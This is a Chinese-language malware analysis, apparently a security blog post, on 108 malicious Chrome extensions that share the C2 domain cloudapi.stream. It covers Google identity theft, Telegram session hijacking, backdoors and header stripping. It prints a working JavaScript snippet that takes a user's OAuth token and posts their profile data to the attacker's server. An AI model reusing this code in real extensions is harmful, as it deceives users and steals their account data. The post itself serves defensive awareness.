108个Chrome恶意插件事件全解析

2026年4月14日，由Socket威胁研究团队的网络安全研究人员发现了一起大规模恶意软件攻击活动，主要针对Chrome浏览器用户。108个恶意Chrome扩展程序，通过Chrome官方商店分发，影响约20,000名用户，它们的核心目标，是窃取Google账户信息、劫持Telegram Web会话，并植入通用后门以控制浏览器。而这108个恶意扩展程序的幕后黑手，因为所有程序被共享同一C2，被认为是同一个攻击者或者是组织

五重身份的伪装者

这些恶意插件通常都提供其宣传的正常功能，例如Telegram侧边栏、小游戏等，这使得用户在享受“正常”服务的同时，对后台的恶意行为毫无察觉

然而，用户并不知道，后台运行的恶意代码会捕获会话信息，注入任意脚本，并打开攻击者选择的 URL。

表面上看，这108个插件分别来自五个不同的开发者身份——Yana Project、GameGen、SideGames、Rodeo Games和InterAlt，分散了用户的警惕，也规避了单一账户被封杀的风险。

但是，这些扩展程序均使用同一个命令与控制（C2）服务器 cloudapi.stream，IP地址为 144.126.135.238，表明这些插件的背后，是同一个攻击者。

多层次的攻击模式

这108个扩展程序的功能并非单一，而是根据其类型“分工”明确，形成了一个多层次的攻击体系。以下是主要恶意功能的类别统计：

这108个插件各司其职，形成了一个完整的“恶意服务”链条：

108个恶意插件 → 54个窃取Google身份 | 45个植入后门 | 2个劫持Telegram | 5个注入广告 | 1个代理翻译 | 2个注入脚本

核心目的：窃取Google账户信息、劫持Telegram会话、植入后门

插件类别	核心恶意行为
45个后门插件	内置 `loadInfo()`，浏览器启动时自动打开攻击者指定的任意网址，沦为流量工具/钓鱼平台。
2个Telegram劫持插件	• Telegram Multi-account：每15秒提取 `user_auth` 令牌，覆盖浏览器存储，强行替换会话。 • Teleside：剥离安全标头窃取会话。
5个广告注入插件	剥离YouTube、TikTok等网站的CSP等安全标头，注入赌博广告或恶意脚本。
1个翻译代理插件	劫持浏览器翻译请求，代理至攻击者服务器，监控用户所有输入。
2个通用脚本注入插件	向用户访问的每个页面注入内容脚本，实现持久化监控与数据收集。

代码级别的恶意行为分析（以Google窃密插件为例）

以下代码来自其中一个恶意插件

（ID: akebllmckjphijojjeiooihnddnplj，其余53个完全相同）：

// 俄语注释：// Проверка на уже авторизованного пользователя// 中文：“检查是否已授权用户”loginBtn.addEventListener("click", async () => {// 1. 调用Chrome合法API，获取用户的Google OAuth2 Bearer Tokenchrome.identity.getAuthToken({ interactive: true }, async (token) => {// 2. 使用该token向Google API请求用户个人信息const res = await fetch("https://www.googleapis.com/oauth2/v3/userinfo", {headers: { Authorization: `Bearer ${token}` }});const profile = await res.json();  // 包含 email, name, picture, sub// 3. 将窃取到的信息发送给攻击者的C2服务器await fetch("https://mines[.]cloudapi[.]stream/auth_google", {method: "POST",headers: { "Content-Type": "application/json" },body: JSON.stringify({email: profile.email,name: profile.name,picture: profile.picture,sub: profile.sub   // Google账户唯一标识符})});});});1

恶意本质：

插件本身没有任何需要Google登录的正常功能。

诱使用户点击登录按钮 → 窃取OAuth2令牌 → 获取个人身份信息（PII） → 发送至攻击者服务器（mines.cloudapi.stream，属于C2域名 cloudapi.stream）。

攻击事件完整时间线

2022年4月30日：攻击者注册了核心C2域名 cloudapi[.]stream 。

持续数年：108个恶意插件陆续上架Chrome Web Store 。

2025年2月15日：最危险的插件”Telegram Multi-account”仍在更新。

2026年4月14日：Socket公司公开调查报告。

报告发布时：大多数插件依然在线，Socket已提交下架请求

幕后黑手是谁？俄语代码留下线索

尽管幕后黑手身份未最终确认，但代码中的俄语注释暗示其开发者可能与俄语地区有关

建议已安装任何扩展程序的用户立即将其删除，并从 Telegram 移动应用程序中注销所有 Telegram Web 会话。

免责声明（天工安全实验室）本文内容仅限于网络安全学习、技术交流及自查自测，旨在帮助读者提升安全意识、加强安全防护能力。严禁将文中任何信息用于非法目的或未经授权的系统测试。

读者基于本文的任何行为均属个人行为，均由使用者自行承担，与本文作者及天工安全实验室公众号无关。

本文部分内容可能来源于网络，如有侵权请联系我们删除。感谢您的理解与支持，让我们共同维护网络安全环境。

长按识别二维码关注我们